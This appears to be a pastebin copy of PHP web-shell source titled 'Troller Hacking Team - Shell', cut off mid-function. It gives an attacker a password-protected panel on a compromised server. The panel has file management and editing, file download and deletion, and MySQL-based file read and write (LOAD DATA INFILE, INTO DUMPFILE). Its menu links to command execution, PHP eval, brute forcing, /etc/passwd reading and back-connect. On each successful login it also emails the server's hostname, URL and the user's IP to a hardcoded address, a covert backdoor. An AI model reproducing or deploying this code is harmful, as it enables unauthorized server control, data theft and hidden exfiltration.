· 11 years ago · Jun 25, 2015, 04:06 AM
1<?php
2error_reporting(7);
3@set_magic_quotes_runtime(0);
4ob_start();
5$mtime = explode(' ', microtime());
6$starttime = $mtime[1] + $mtime[0];
7define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
8//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
9define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
10define('IS_COM', class_exists('COM') ? 1 : 0 );
11define('IS_GPC', get_magic_quotes_gpc());
12$dis_func = get_cfg_var('disable_functions');
13define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
14@set_time_limit(0);
15
16foreach(array('_GET','_POST') as $_request) {
17 foreach($$_request as $_key => $_value) {
18 if ($_key{0} != '_') {
19 if (IS_GPC) {
20 $_value = s_array($_value);
21 }
22 $$_key = $_value;
23 }
24 }
25}
26
27/*================= Info Login ================*/
28$admin = array();
29$admin['check'] = true;
30$admin['pass'] = 'duongduchai'; // Password login
31$admin['cookiepre'] = '';
32$admin['cookiedomain'] = '';
33$admin['cookiepath'] = '/';
34$admin['cookielife'] = 86400;
35/*===================== End =====================*/
36
37if ($charset == 'utf8') {
38 header("content-Type: text/html; charset=utf-8");
39} elseif ($charset == 'big5') {
40 header("content-Type: text/html; charset=big5");
41} elseif ($charset == 'gbk') {
42 header("content-Type: text/html; charset=gbk");
43} elseif ($charset == 'latin1') {
44 header("content-Type: text/html; charset=iso-8859-2");
45}
46
47$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
48$timestamp = time();
49
50/*===================== Login =====================*/
51if ($action == "logout") {
52 scookie('vbapass', '', -86400 * 365);
53 p('<meta http-equiv="refresh" content="0;URL='.$self.'">');
54 p('<body background=black>');
55 exit;
56}
57if($admin['check']) {
58 if ($doing == 'login') {
59 if ($admin['pass'] == $password) {
60 scookie('vbapass', $password);
61
62// Function mail Sender to my Email - Please remove this before you using this shell code, Thanks - Fernando - VBATeam
63$time_shell = "".date("d/m/Y - H:i:s")."";
64$ip_remote = $_SERVER["REMOTE_ADDR"];
65$from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']).'';
66$to_email = 'choivoinhau123@gmail.com';
67$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ".$_SERVER['HTTP_HOST']."";
68$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
69$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
70@mail($to_email, $server_mail, $linkcr, $header);
71 p('<meta http-equiv="refresh" content="2;URL='.$self.'">');
72 p('<body bgcolor=black>
73<BR><BR><div align=center><font color=yellow face=tahoma size=2>Troller Hacking Team - Shell - Please wait...<BR><img src=http://maps.nrel.gov/sites/all/modules/custom_modules/swera/assets/images/loading_bar.gif></div>');
74 exit;
75 }
76
77 else
78 {
79 $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>M?t Kh?u Sai,Th? L?i Äê</blink><BR></font></div></td></tr></table>';
80echo $err_mess;
81 }}
82 if ($_COOKIE['vbapass']) {
83 if ($_COOKIE['vbapass'] != $admin['pass']) {
84 loginpage();
85 }
86 } else {
87 loginpage();
88 }
89}
90/*===================== Login =====================*/
91
92$errmsg = '';
93
94if ($action == 'phpinfo') {
95 if (IS_PHPINFO) {
96 phpinfo();
97 } else {
98 $errmsg = 'phpinfo() function has non-permissible';
99 }
100}
101
102
103if ($doing == 'downfile' && $thefile) {
104 if (!@file_exists($thefile)) {
105 $errmsg = 'The file you want Downloadable was nonexistent';
106 } else {
107 $fileinfo = pathinfo($thefile);
108 header('Content-type: application/x-'.$fileinfo['extension']);
109 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
110 header('Content-Length: '.filesize($thefile));
111 @readfile($thefile);
112 exit;
113 }
114}
115
116
117if ($doing == 'backupmysql' && !$saveasfile) {
118 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
119 $table = array_flip($table);
120 $result = q("SHOW tables");
121 if (!$result) p('<h2>'.mysql_error().'</h2>');
122 $filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
123 header('Content-type: application/unknown');
124 header('Content-Disposition: attachment; filename='.$filename);
125 $mysqldata = '';
126 while ($currow = mysql_fetch_array($result)) {
127 if (isset($table[$currow[0]])) {
128 $mysqldata .= sqldumptable($currow[0]);
129 }
130 }
131 mysql_close();
132 exit;
133}
134
135// Mysql
136if($doing=='mysqldown'){
137 if (!$dbname) {
138 $errmsg = 'Please input dbname';
139 } else {
140 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
141 if (!file_exists($mysqldlfile)) {
142 $errmsg = 'The file you want Downloadable was nonexistent';
143 } else {
144 $result = q("select load_file('$mysqldlfile');");
145 if(!$result){
146 q("DROP TABLE IF EXISTS tmp_angel;");
147 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
148 //Download SQL
149 q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
150 $result = q("select content from tmp_angel");
151 q("DROP TABLE tmp_angel");
152 }
153 $row = @mysql_fetch_array($result);
154 if (!$row) {
155 $errmsg = 'Load file failed '.mysql_error();
156 } else {
157 $fileinfo = pathinfo($mysqldlfile);
158 header('Content-type: application/x-'.$fileinfo['extension']);
159 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
160 header("Accept-Length: ".strlen($row[0]));
161 echo $row[0];
162 exit;
163 }
164 }
165 }
166}
167
168?>
169<html>
170<head>
171<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
172<title><?php echo str_replace('.','','Troller Hacking Team - Shell');?></title>
173<style type="text/css">
174body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}
175
176a {color: #74A202;text-decoration:none;}
177a:hover{color: #f00;text-decoration:underline;}
178.alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
179.alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
180.focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
181.fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
182.fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
183.head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}
184.head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
185.head td span{font-weight:normal;}
186form{margin:0;padding:0;}
187h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
188ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
189u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
190input, textarea, button
191{
192 font-size: 9pt;
193 color: #ccc;
194 font-family: verdana, sans-serif;
195 background-color: #202020;
196 border-left: 1px solid #74A202;
197 border-top: 1px solid #74A202;
198 border-right: 1px solid #74A202;
199 border-bottom: 1px solid #74A202;
200}
201select
202{
203 font-size: 8pt;
204 font-weight: normal;
205 color: #ccc;
206 font-family: verdana, sans-serif;
207 background-color: #202020;
208}
209
210</style>
211<script type="text/javascript">
212function CheckAll(form) {
213 for(var i=0;i<form.elements.length;i++) {
214 var e = form.elements[i];
215 if (e.name != 'chkall')
216 e.checked = form.chkall.checked;
217 }
218}
219function $(id) {
220 return document.getElementById(id);
221}
222function goaction(act){
223 $('goaction').action.value=act;
224 $('goaction').submit();
225}
226</script>
227</head>
228<body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://i382.photobucket.com/albums/oo263/vnhacker/bg-1.jpg>
229
230
231<div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
232 <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
233 <tr>
234 <td align="center" valign=center>
235 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600" align="center">
236 Loading<img src="http://maps.nrel.gov/sites/all/modules/custom_modules/swera/assets/images/loading_bar.gif">
237 </div>
238 </td>
239 </tr>
240 </table>
241 </div>
242 <script>
243 var ld=(document.all);
244 var ns4=document.layers;
245 var ns6=document.getElementById&&!document.all;
246 var ie4=document.all;
247 if (ns4)
248 ld=document.loading;
249 else if (ns6)
250 ld=document.getElementById("loading").style;
251 else if (ie4)
252 ld=document.all.loading.style;
253 function init()
254 {
255 if(ns4){ld.visibility="hidden";}
256 else if (ns6||ie4) ld.display="none";
257 }
258 </script>
259
260
261
262
263<table width="100%" border="0" cellpadding="0" cellspacing="0">
264 <tr class="head_small">
265 <td width=100%>
266 <table width=100%><tr class="head_small"><td width=86px><a title="Troller Hacking Team - Shell" href="<?php $self;?>"><img src=https://media1.giphy.com/media/8oh42nM14t50Q/200.gif height=86 border=0></a></td><td>
267 <span style="float:left;"> <?php echo "Hostname: ".$_SERVER['HTTP_HOST']."";?> | <a href="http://google.com.vn" target="_blank"><?php echo str_replace('.','','Troller Hacking Team - Shell');?> </a> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span> <br />
268
269 <?php
270 $curl_on = @function_exists('curl_version');
271 $mysql_on = @function_exists('mysql_connect');
272 $mssql_on = @function_exists('mssql_connect');
273 $pg_on = @function_exists('pg_connect');
274 $ora_on = @function_exists('ocilogon');
275
276echo (($safe_mode)?("Safe_mod: <b><font color=green>ON</font></b> - "):("Safe_mod: <b><font color=red>OFF</font></b> - "));
277echo "PHP version: <b>".@phpversion()."</b> - ";
278 echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b> - "):("<b><font color=red>OFF</font></b> - "));
279 echo "MySQL: <b>";
280$mysql_on = @function_exists('mysql_connect');
281if($mysql_on){
282echo "<font color=green>ON</font></b> - "; } else { echo "<font color=red>OFF</font></b> - "; }
283echo "MSSQL: <b>";
284$mssql_on = @function_exists('mssql_connect');
285if($mssql_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
286echo "PostgreSQL: <b>";
287$pg_on = @function_exists('pg_connect');
288if($pg_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
289echo "Oracle: <b>";
290$ora_on = @function_exists('ocilogon');
291if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b><BR>";}
292
293echo "Disable functions : <b>";
294if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b><BR>";}else{echo "<font color=red>$df</font></b><BR>";}
295
296echo "<font color=white>Uname -a</font>: ".@substr(@php_uname(),0,120)."<br>";
297echo "<font color=white>Server</font>: ".@substr($SERVER_SOFTWARE,0,120)." - <font color=white>id</font>: ".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")<br>";
298 ?>
299 </td></tr></table></td>
300 </tr>
301 <tr class="alt1">
302 <td width=10%><span style="float:left;">[Server IP: <?php echo "<font color=yellow>".gethostbyname($_SERVER['SERVER_NAME'])."</font>";?> - Your IP: <?php echo "<font color=yellow>".$_SERVER['REMOTE_ADDR']."</font>";?>] </span> <br />
303--------------------------------------------------------------------------------------<br />
304
305 <a href="javascript:goaction('file');">File Manager</a> |
306 <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
307 <a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
308 <a href="javascript:goaction('shell');">Execute Command</a> |
309 <a href="javascript:goaction('phpenv');">PHP Variable</a> |
310 <a href="javascript:goaction('eval');">Eval PHP Code</a>
311 <?php if (!IS_WIN) {?> | <a href="javascript:goaction('brute');">Brute</a> <?php }?>
312 <?php if (!IS_WIN) {?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php }?>
313 <?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
314 </td>
315 </tr>
316</table>
317<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
318<?php
319
320formhead(array('name'=>'goaction'));
321makehide('action');
322formfoot();
323
324$errmsg && m($errmsg);
325
326// Dir function
327!$dir && $dir = '.';
328$nowpath = getPath(SA_ROOT, $dir);
329if (substr($dir, -1) != '/') {
330 $dir = $dir.'/';
331}
332$uedir = ue($dir);
333
334if (!$action || $action == 'file') {
335
336 // Non-writeable
337 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
338
339 // Delete dir
340 if ($doing == 'deldir' && $thefile) {
341 if (!file_exists($thefile)) {
342 m($thefile.' directory does not exist');
343 } else {
344 m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
345 }
346 }
347
348 // Create new dir
349 elseif ($newdirname) {
350 $mkdirs = $nowpath.$newdirname;
351 if (file_exists($mkdirs)) {
352 m('Directory has already existed');
353 } else {
354 m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
355 @chmod($mkdirs,0777);
356 }
357 }
358
359 // Upload file
360 elseif ($doupfile) {
361 m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
362 }
363
364 // Edit file
365 elseif ($editfilename && $filecontent) {
366 $fp = @fopen($editfilename,'w');
367 m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
368 @fclose($fp);
369 }
370
371 // Modify
372 elseif ($pfile && $newperm) {
373 if (!file_exists($pfile)) {
374 m('The original file does not exist');
375 } else {
376 $newperm = base_convert($newperm,8,10);
377 m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
378 }
379 }
380
381 // Rename
382 elseif ($oldname && $newfilename) {
383 $nname = $nowpath.$newfilename;
384 if (file_exists($nname) || !file_exists($oldname)) {
385 m($nname.' has already existed or original file does not exist');
386 } else {
387 m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
388 }
389 }
390
391 // Copu
392 elseif ($sname && $tofile) {
393 if (file_exists($tofile) || !file_exists($sname)) {
394 m('The goal file has already existed or original file does not exist');
395 } else {
396 m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
397 }
398 }
399
400 // File exit
401 elseif ($curfile && $tarfile) {
402 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
403 m('The goal file has already existed or original file does not exist');
404 } else {
405 $time = @filemtime($tarfile);
406 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
407 }
408 }
409
410 // Date
411 elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
412 if (!@file_exists($curfile)) {
413 m(basename($curfile).' does not exist');
414 } else {
415 $time = strtotime("$year-$month-$day $hour:$minute:$second");
416 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
417 }
418 }
419
420 // Download
421 elseif($doing == 'downrar') {
422 if ($dl) {
423 $dfiles='';
424 foreach ($dl as $filepath => $value) {
425 $dfiles.=$filepath.',';
426 }
427 $dfiles=substr($dfiles,0,strlen($dfiles)-1);
428 $dl=explode(',',$dfiles);
429 $zip=new PHPZip($dl);
430 $code=$zip->out;
431 header('Content-type: application/octet-stream');
432 header('Accept-Ranges: bytes');
433 header('Accept-Length: '.strlen($code));
434 header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
435 echo $code;
436 exit;
437 } else {
438 m('Please select file(s)');
439 }
440 }
441
442 // Delete file
443 elseif($doing == 'delfiles') {
444 if ($dl) {
445 $dfiles='';
446 $succ = $fail = 0;
447 foreach ($dl as $filepath => $value) {
448 if (@unlink($filepath)) {
449 $succ++;
450 } else {
451 $fail++;
452 }
453 }
454 m('Deleted file have finished??choose '.count($dl).' success '.$succ.' fail '.$fail);
455 } else {
456 m('Please select file(s)');
457 }
458 }
459
460 // Function Newdir
461 formhead(array('name'=>'createdir'));
462 makehide('newdirname');
463 makehide('dir',$nowpath);
464 formfoot();
465 formhead(array('name'=>'fileperm'));
466 makehide('newperm');
467 makehide('pfile');
468 makehide('dir',$nowpath);
469 formfoot();
470 formhead(array('name'=>'copyfile'));
471 makehide('sname');
472 makehide('tofile');
473 makehide('dir',$nowpath);
474 formfoot();
475 formhead(array('name'=>'rename'));
476 makehide('oldname');
477 makehide('newfilename');
478 makehide('dir',$nowpath);
479 formfoot();
480 formhead(array('name'=>'fileopform'));
481 makehide('action');
482 makehide('opfile');
483 makehide('dir');
484 formfoot();
485
486 $free = @disk_free_space($nowpath);
487 !$free && $free = 0;
488 $all = @disk_total_space($nowpath);
489 !$all && $all = 0;
490 $used = $all-$free;
491 $used_percent = @round(100/($all/$free),2);
492 p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>'.sizecount($free).'</font> of <font color=red>'.sizecount($all).'</font> (<font color=red>'.$used_percent.'</font>%)</font>');
493
494?>
495<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
496 <form action="" method="post" id="godir" name="godir">
497 <tr>
498 <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
499 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
500 <td nowrap><input class="bt" value="GO" type="submit"></td>
501 </tr>
502 </form>
503</table>
504<script type="text/javascript">
505function createdir(){
506 var newdirname;
507 newdirname = prompt('Please input the directory name:', '');
508 if (!newdirname) return;
509 $('createdir').newdirname.value=newdirname;
510 $('createdir').submit();
511}
512function fileperm(pfile){
513 var newperm;
514 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
515 if (!newperm) return;
516 $('fileperm').newperm.value=newperm;
517 $('fileperm').pfile.value=pfile;
518 $('fileperm').submit();
519}
520function copyfile(sname){
521 var tofile;
522 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
523 if (!tofile) return;
524 $('copyfile').tofile.value=tofile;
525 $('copyfile').sname.value=sname;
526 $('copyfile').submit();
527}
528function rename(oldname){
529 var newfilename;
530 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
531 if (!newfilename) return;
532 $('rename').newfilename.value=newfilename;
533 $('rename').oldname.value=oldname;
534 $('rename').submit();
535}
536function dofile(doing,thefile,m){
537 if (m && !confirm(m)) {
538 return;
539 }
540 $('filelist').doing.value=doing;
541 if (thefile){
542 $('filelist').thefile.value=thefile;
543 }
544 $('filelist').submit();
545}
546function createfile(nowpath){
547 var filename;
548 filename = prompt('Please input the file name:', '');
549 if (!filename) return;
550 opfile('editfile',nowpath + filename,nowpath);
551}
552function opfile(action,opfile,dir){
553 $('fileopform').action.value=action;
554 $('fileopform').opfile.value=opfile;
555 $('fileopform').dir.value=dir;
556 $('fileopform').submit();
557}
558function godir(dir,view_writable){
559 if (view_writable) {
560 $('godir').view_writable.value=1;
561 }
562 $('godir').dir.value=dir;
563 $('godir').submit();
564}
565</script>
566 <?php
567 tbhead();
568 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
569 p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
570 p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
571 if ($view_writable) {
572 p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
573 } else {
574 p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
575 }
576 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
577 if (IS_WIN && IS_COM) {
578 $obj = new COM('scripting.filesystemobject');
579 if ($obj && is_object($obj)) {
580 $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
581 foreach($obj->Drives as $drive) {
582 if ($drive->DriveType == 2) {
583 p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).' Free:'.sizecount($drive->FreeSpace).' Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
584 } else {
585 p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
586 }
587 }
588 }
589 }
590
591 p('</td></tr></form>');
592
593 p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
594
595 // Get path
596 $dirdata=array();
597 $filedata=array();
598
599 if ($view_writable) {
600 $dirdata = GetList($nowpath);
601 } else {
602 // Open dir
603 $dirs=@opendir($dir);
604 while ($file=@readdir($dirs)) {
605 $filepath=$nowpath.$file;
606 if(@is_dir($filepath)){
607 $dirdb['filename']=$file;
608 $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
609 $dirdb['dirchmod']=getChmod($filepath);
610 $dirdb['dirperm']=getPerms($filepath);
611 $dirdb['fileowner']=getUser($filepath);
612 $dirdb['dirlink']=$nowpath;
613 $dirdb['server_link']=$filepath;
614 $dirdb['client_link']=ue($filepath);
615 $dirdata[]=$dirdb;
616 } else {
617 $filedb['filename']=$file;
618 $filedb['size']=sizecount(@filesize($filepath));
619 $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
620 $filedb['filechmod']=getChmod($filepath);
621 $filedb['fileperm']=getPerms($filepath);
622 $filedb['fileowner']=getUser($filepath);
623 $filedb['dirlink']=$nowpath;
624 $filedb['server_link']=$filepath;
625 $filedb['client_link']=ue($filepath);
626 $filedata[]=$filedb;
627 }
628 }// while
629 unset($dirdb);
630 unset($filedb);
631 @closedir($dirs);
632 }
633 @sort($dirdata);
634 @sort($filedata);
635 $dir_i = '0';
636 foreach($dirdata as $key => $dirdb){
637 if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
638 $thisbg = bg();
639 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
640 p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
641 p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
642 p('<td nowrap>'.$dirdb['mtime'].'</td>');
643 p('<td nowrap>--</td>');
644 p('<td nowrap>');
645 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
646 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
647 p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
648 p('</tr>');
649 $dir_i++;
650 } else {
651 if($dirdb['filename']=='..') {
652 p('<tr class=fout>');
653 p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
654 p('</tr>');
655 }
656 }
657 }
658
659 p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
660 p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
661 makehide('action','file');
662 makehide('thefile');
663 makehide('doing');
664 makehide('dir',$nowpath);
665 $file_i = '0';
666 foreach($filedata as $key => $filedb){
667 if($filedb['filename']!='..' && $filedb['filename']!='.') {
668 $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
669 $thisbg = bg();
670 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
671 p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
672 p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
673 p('<td nowrap>'.$filedb['mtime'].'</td>');
674 p('<td nowrap>'.$filedb['size'].'</td>');
675 p('<td nowrap>');
676 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
677 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
678 p('<td nowrap>');
679 p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
680 p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
681 p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
682 p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
683 p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
684 p('</td></tr>');
685 $file_i++;
686 }
687 }
688 p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
689 p('</form></table>');
690}// end dir
691
692elseif ($action == 'sqlfile') {
693 if($doing=="mysqlupload"){
694 $file = $_FILES['uploadfile'];
695 $filename = $file['tmp_name'];
696 if (file_exists($savepath)) {
697 m('The goal file has already existed');
698 } else {
699 if(!$filename) {
700 m('Please choose a file');
701 } else {
702 $fp=@fopen($filename,'r');
703 $contents=@fread($fp, filesize($filename));
704 @fclose($fp);
705 $contents = bin2hex($contents);
706 if(!$upname) $upname = $file['name'];
707 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
708 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
709 m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
710 }
711 }
712 }
713?>
714<script type="text/javascript">
715function mysqlfile(doing){
716 if(!doing) return;
717 $('doing').value=doing;
718 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
719 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
720 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
721 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
722 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
723 $('mysqlfile').charset.value=$('dbinfo').charset.value;
724 $('mysqlfile').submit();
725}
726</script>
727<?php
728 !$dbhost && $dbhost = 'localhost';
729 !$dbuser && $dbuser = 'root';
730 !$dbport && $dbport = '3306';
731 $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
732 formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
733 makehide('action','sqlfile');
734 p('<p>');
735 p('DBHost:');
736 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
737 p(':');
738 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
739 p('DBUser:');
740 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
741 p('DBPass:');
742 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
743 p('DBName:');
744 makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
745 p('DBCharset:');
746 makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
747 p('</p>');
748 formfoot();
749 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
750 p('<h2>Upload file</h2>');
751 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
752 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
753 p('<h2>Download file</h2>');
754 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
755 makehide('dbhost');
756 makehide('dbport');
757 makehide('dbuser');
758 makehide('dbpass');
759 makehide('dbname');
760 makehide('charset');
761 makehide('doing');
762 makehide('action','sqlfile');
763 p('</form>');
764}
765
766elseif ($action == 'sqladmin') {
767 !$dbhost && $dbhost = 'localhost';
768 !$dbuser && $dbuser = 'root';
769 !$dbport && $dbport = '3306';
770 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
771 if(isset($dbhost)){
772 $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
773 }
774 if(isset($dbuser)) {
